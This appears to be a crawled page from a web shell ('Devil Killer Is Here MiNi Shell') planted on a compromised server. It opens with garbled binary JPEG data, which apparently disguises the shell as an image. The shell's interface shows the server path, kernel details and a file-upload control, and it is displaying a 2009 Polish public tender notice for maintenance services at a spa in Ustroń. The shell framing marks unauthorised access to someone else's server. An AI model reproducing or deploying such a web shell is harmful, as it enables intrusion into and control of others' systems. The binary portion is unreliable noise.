JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090805/268086-N-2009.html

<p class="kh_header"><b>Ustroń: Wykonywanie kompleksowych usług konserwatorskich w Uzdrowiskowym Zakładzie Przyrodoleczniczym w Ustroniu ul. Sanatoryjna 7</b><br>
<b>Numer ogłoszenia: 268086 - 2009; data zamieszczenia: 05.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Uzdrowiskowe "Ustroń" S.A. , ul. Sanatoryjna 1, 43-450 Ustroń, woj. śląskie, tel. (033) 8565650, faks 033 8543825.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ustron.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie kompleksowych usług konserwatorskich w Uzdrowiskowym Zakładzie Przyrodoleczniczym w Ustroniu ul. Sanatoryjna 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiot zamówienia stanowią  usługi:
Konserwacji  instalacji elektrycznej, instalacji odgromowej, instalacji centralnego ogrzewania, wentylacji, instalacji solankowej i kwasowęglowej do kąpieli leczniczych, instalacji ciepłej i zimnej wody wraz z odbiornikami zainstalowanymi na stałe oraz kanalizacji odprowadzającej ścieki i wody opadowe oraz obsługa, naprawy i utrzymanie w sprawności technicznej wymienionych urządzeń i instalacji. Wykonywanie prac naprawczych mebli, stolarki drzwiowej i okiennej, prostego sprzętu rehabilitacyjnego i zabiegowego, a także niewielkich prac gospodarczych i transportowych wewnątrz i na zewnątrz budynku UZPL przy ul. Sanatoryjnej 7 w Ustroniu.

2. Przedmiot zamówienia obejmuje w szczególności:
2.1. Konserwację stałą i naprawy w zakresie:
a)	instalacji elektrycznej,
b)	instalacji odgromowej,
c)	instalacji centralnego ogrzewania,
d)	wentylacji mechanicznej nawiewno-wywiewnej,
e)	instalacji solankowej i kwasowęglowej do kąpieli leczniczych,
f)	instalacji ciepłej i zimnej wody,
g)	kanalizacji odprowadzającej ścieki i wody opadowe,
h)	kanalizacji odprowadzającej ścieki solanki i borowiny pozabiegowej,
i)	stolarki drzwiowej, okiennej i mebli (naprawa i wymiana zamków, zawiasów itp.),
j)	prostego sprzętu rehabilitacyjnego i zabiegowego, 
k)	odbiorników i urządzeń elektrycznych zainstalowanych w budynku (suszarki, wentylatory).
2.2. Utrzymanie w sprawności technicznej następujących urządzeń i instalacji:
a)	instalacji elektrycznej, gniazd wtykowych, opraw oświetleniowych wewnątrz i na zewnątrz budynku,
b)	instalacji odgromowej w zakresie połączeń,
c)	instalacji centralnego ogrzewania wewnątrz budynku do grzejników włącznie,
d)	wentylacji mechanicznej nawiewno-wywiewnej,
e)	instalacji solankowej i kwasowęglowej do kąpieli od zbiorników hydroforowych w kuchni solankowej i saturatorni do stanowisk zabiegowych
f)	instalacji ciepłej i zimnej wody - od kanałów budynku do baterii umywalkowych, zlewozmywakowych i spłuczek włącznie,
g)	kanalizacji odprowadzającej ścieki - od odbiorników (umywalek,
zlewozmywaków, sedesów) do wyjścia poziomu na zewnątrz budynku,
h)	kanalizacji odprowadzającej wody opadowe z dachu do wyjścia poziomu na zewnątrz budynku,
i)	kanalizacji odprowadzającej ścieki solanki od wanien do kąpieli solankowych do kolektora zrzutowego,
j)	kanalizacji odprowadzającej ścieki borowiny pozabiegowej od stanowisk zabiegowych do zbiornika gromadzącego.
2.3. Czynności obsługowe instalacji:
   1. Instalacja elektryczna i instalacja odgromowa:
a)	wymiana gniazd wtykowych, żarówek, świetlówek, załączanie wyłączników różnicowo - prądowych i nadmiarowych itp.,
b)	naprawy i wymiana osprzętu i wyposażenia elektrycznego budynku: lamp oświetleniowych terenu, żyrandoli, suszarek, poprawianie mocowania gniazd wtykowych, wyłączników klawiszowych itp.,
c)	okresowe - 1 raz w roku w kwietniu - sprawdzanie stanu połączeń instalacji odgromowej oraz dokonanie zabezpieczenia połączeń przed wpływami atmosferycznymi.
Wymiana gniazd wtykowych, żarówek, świetlówek, naprawy opraw oświetleniowych, przedłużaczy, poprawianie mocowania gniazd wtykowych obejmuje wszystkie pomieszczenia UZPL, których administratorem jest Zamawiający.
2. Instalacja centralnego ogrzewania:
a)	przygotowanie instalacji do sezonu grzewczego, poinformowanie pisemnie Zamawiającego o wykonaniu tej czynności najpóźniej do 10 września i zgłoszenie uwag o aktualnym stanie technicznym,
b)	odpowietrzanie instalacji i grzejników, uzupełnianie wody w instalacji, wymiana zaworów, usuwanie przecieków itp.,
 3. Instalacja ciepłej i zimnej wody:
a)	usuwanie przecieków i nieszczelności, wymiana uszczelek, zaworów, wężyków itp.,
b)	naprawa baterii, spłuczek itp.
Konserwacja, wymiana, naprawa baterii umywalkowych, zlewozmywakowych i spłuczek, obejmuje wszystkie pomieszczenia UZPL, których administratorem jest Zamawiający.
4. Instalacja solankowa i kwasowęglowa do kąpieli leczniczych:
a)	usuwanie przecieków i nieszczelności, wymiana uszczelek, zaworów, itp.
5. Kanalizacja odprowadzająca ścieki i wody opadowe:
a)	udrażnianie kanalizacji i rur spustowych odprowadzających ścieki i wody opadowe, usuwanie przecieków itp.,
b)	czyszczenie koryt odprowadzających wody opadowe i kratek ściekowych w korytach na dachu segmentu A i B
c)	wykonywanie koniecznych uszczelnień i napraw wlotów rur spustowych wód opadowych.
Konserwacja kanalizacji obejmuje wszystkie pomieszczenia UZPL, których administratorem jest Zamawiający.
6. Kanalizacja odprowadzająca ścieki solanki i borowiny pozabiegowej:
a)	udrażnianie kanalizacji i rur spustowych odprowadzających ścieki i wody opadowe, usuwanie przecieków itp.,
b)	wykonywanie koniecznych uszczelnień i napraw rur spustowych.
2.4. Wentylacja mechaniczna nawiewno-wywiewna:
a)	dbanie o czystość central nawiewno-wywiewnych, czerpni i wyrzutni powietrza,
b)	sprawdzanie stanu technicznego, czyszczenie filtrów lub wymiana  - 2 razy w roku w październiku i w marcu - pisemne zgłoszenie Zamawiającemu wykonanej czynności w celu dokonania odbioru,
2.5. Obsługa budynku
a)	obsługa sal konferencyjnych (ustawianie mebli),
b)	prace przy zmianie wystroju pokoi biurowych np.: montaż i demontaż wieszaków, tablic ogłoszeniowych, karniszy, żaluzji, desek odbojowych, itp.,
c)	prace gospodarcze np.: naprawa mebli i drzwi, pomoc przy zmianie wystroju budynku w okresach świątecznych
c)	prace transportowe np.: przenoszenie małogabarytowego sprzętu, dokumentów, druków i dostaw na terenie budynku, przenoszenie mebli w przypadku przeprowadzek pojedynczych pokoi,
d)	usuwanie piasku i zanieczyszczeń z prowadnic drzwi wejściowych automatycznych,
e)	utrzymanie czystości i porządku w pomieszczeniach technicznych,
f)	pomoc służbom sprzątającym przy pracach związanym z czyszczeniem kratek wentylacyjnych i urządzeń elektrycznych (np. opraw oświetleniowych),
g)	wykonywanie codziennych przeglądów i usuwanie na bieżąco zauważonych uszkodzeń i awarii i powiadamianie Zamawiającego o zaistniałych sytuacjach.
2.6. Naprawa sprzętu rehabilitacyjnego i zabiegowego:
a)	drobne naprawy ślusarsko-mechaniczne sprzętu rehabilitacyjnego (naprawa wózków inwalidzkich, smarowanie, regulacja, wymiana linek itp.),
b)	usuwanie w miarę technicznych możliwości przecieków solanki, ciepłej i zimnej wody oraz wody nasyconej CO2 na wannach zabiegowych. W przypadku ich  nie usunięcia informowanie Kierownika UZPL w celu podjęcia dalszych kroków.
3.   Pozostałe wymagania dotyczące przedmiotu zamówienia.
3.1. Wymagania dotyczące zatrudnienia i wymagany czas pracy - w ramach wynagrodzenia określonego w ofercie, dotyczącej niniejszego zamówienia:
a) przedmiot umowy będzie realizowany w dni robocze od godziny 7.00 do 18.00 i soboty od godziny 7.00 do 15.30,
b) Wykonawca wskaże osobę sprawującą nadzór nad osobami wykonującym usługę,
c) Wykonawca zapewni stałą łączność bezprzewodową z osobami wykonującymi usługę na terenie budynku i z osobą nadzorującą oraz przekaże Zamawiającemu numery telefonów.
3.2. W ramach realizacji przedmiotu zamówienia Zamawiający wymaga od Wykonawcy:
1. Posiadania sprzętu i narzędzi niezbędnych do realizacji zamówienia w niżej podanym zakresie:
a)	uniwersalny komplet narzędzi podręcznych elektrycznych i hydraulicznych,
b)	uniwersalna wiertarka ręczną elektryczna,
c)	szlifierka stołowa,
d)	gwintownica z kompletem narzynek,
e)	zgrzewarka do rur PCV,
f)	urządzenia spawalnicze,
g)	aparat do spawania
h)	podręczny wykrywacz metali ( do lokalizacji przewodów w ścianie),
i)	odkurzacz przemysłowy,
j)	uniwersalny miernik elektryczny,
k)	miernik izolacji,
l)	kleszczowy miernik prądu,
m)	przyrząd do sprawdzania wyłączników różnicowo prądowych,
n)	sprężyny do udrażniania kanalizacji, tj.: podejść pionów i poziomów,
o)	wyposażenie bhp (okulary, ubrania ochronne, obuwie ochronne i kalosze).
2. Dbałości o należyty porządek w pomieszczeniach objętych konserwacją oraz w piwnicach i na dachu.
3. W czasie pracy na terenie budynku, pracownicy Wykonawcy powinni być ubrani w czyste firmowe ubrania robocze.
3.3. Materiały:
1. Wykonawca zapewnia na swój koszt wszystkie materiały konieczne do realizacji przedmiotu zamówienia.
2. Dostarczone przez wykonawcę materiały powinny posiadać wymagane atesty i dopuszczenia do stosowania.
3. W przypadku wątpliwości przy zakupie materiału należy skonsultować się z Kierownikiem  UZPL.
3.4. Zobowiązania Zamawiającego w celu realizacji zamówienia:
1.  Ze strony Zamawiającego wyznacza  się Kierownika UZPL jako osobę odpowiedzialną za realizację zamówienia i koordynowanie prac.
2. Gospodarka odpadami: Wykonawca jest zobowiązany do postępowania z odpadami zgodnie z obowiązującym u Zamawiającego programem gospodarki odpadami oraz instrukcją postępowania z odpadami.
3. Wykonawca odpowiedzialny jest za jakość oraz zgodność świadczonych usług z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.
4. Wymagana jest należyta staranność przy realizacji zobowiązań umowy. 
5. Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
6. Wykonawca jest zobowiązany przedstawić w formularzu oferty osoby odpowiedzialne za realizację zamówienia i telefony kontaktowe oraz inne informacje niezbędne do sprawnego i terminowego wykonania zamówienia.
7. Termin płatności faktury nie może być krótszy niż 28 dni.
8. Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym zakresem rzeczowym zadania (miejsce realizacji usługi) oraz zdobył informacje, które mogą być konieczne do przygotowania oferty..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają wymagania opisane w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
2. Aby Wykonawca mógł wziąć udział w postępowaniu musi wykazać, że  firma dysponuje co najmniej 2  osobami, uprawnionym do świadczenia usług na rzecz Zamawiającego tzn. pracowników posiadających:
- doświadczenie w wykonywaniu pracy konserwatorskich w obiektach,
- uprawnienia kwalifikacyjne uprawniające do zajmowania się eksploatacją sieci, urządzeń i instalacji energetycznych wytwarzających i zużywających energię elektryczną o napięciu do 1 kV wydanymi zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r.- § 5 ust.1, pkt 1 (Dz. U. Nr 89, poz. 828 ze zm.),
3. Doświadczenie Wykonawcy, - aby Wykonawca mógł wziąć udział w postępowaniu musi wykazać, że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywał, co najmniej 2 zamówienia o wartości nie mniejszej niż 20.000,00 zł brutto (każde zamówienie z osobna). Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty zostały wykonane należycie.
4. Sytuacja ekonomiczna i finansowa - Wykonawca musi mieć dostęp lub dysponować środkami finansowymi na realizację zamówienia w wysokości, co najmniej 20.000,00 zł bez uwzględnienia zobowiązań z tytułu innych zamówień.
5. Sposób dokonania oceny spełnienia wymaganych warunków:
1) przy dokonaniu oceny spełnienia warunków udziału w postępowaniu Zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
2) nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania,
3) ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na ofertę składają się następujące dokumenty i załączniki:
1)	wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1, 
2)	oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik 2,
3)	parafowany przez wykonawcę formularz postanowień umowy - załącznik nr 3 .
W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r - Prawo zamówień publicznych, do oferty należy dołączyć następujące dokumenty:
4)	aktualny odpis z rejestru sądowego lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, wraz z umową spółki cywilnej, jeżeli działalność gospodarcza jest prowadzona w formie spółki cywilnej oraz pełnomocnictwo (jeżeli dotyczy).
W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty:
5) wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia - załącznik nr 4, 
6) wykaz wykonywanych w okresie ostatnich trzech lat usług, przed dniem wszczęcia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających każda swoim rodzajem i wartością dostawom stanowiącym przedmiot niniejszego zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - czyli co najmniej 2 zamówienia o wartości nie mniejszej niż 20.000,00 zł brutto (każde zamówienie z osobna) - załącznik nr 5; 
7) referencje - dokument, który potwierdzi fakt, iż usługi wymienione w załączniku nr 5 zostały zrealizowane z należytą starannością,
W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz nie został skazany prawomocnym wyrokiem sądu, do oferty należy dołączyć następujące dokumenty:
8) oświadczenie - załącznik nr 6.
9) polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej (OC deliktu i OC kontraktu wynoszącą łącznie 20.000,00 zł), a także dokument potwierdzający opłacenie składki, chyba że dowód jej opłacenia wynika z w/w polisy lub innego dokumentu ubezpieczenia (np. oświadczenie ubezpieczyciela potwierdzające powyższy fakt) - podlega uaktualnieniu przez cały czas trwania umowy; polisa dotyczyć wina przedmiotu zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ustron.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ustroń, ul. Sanatoryjna 1, pok nr 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2009 godzina 10:00, miejsce: Ustroń, ul. Sanatoryjna 1, pok nr 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com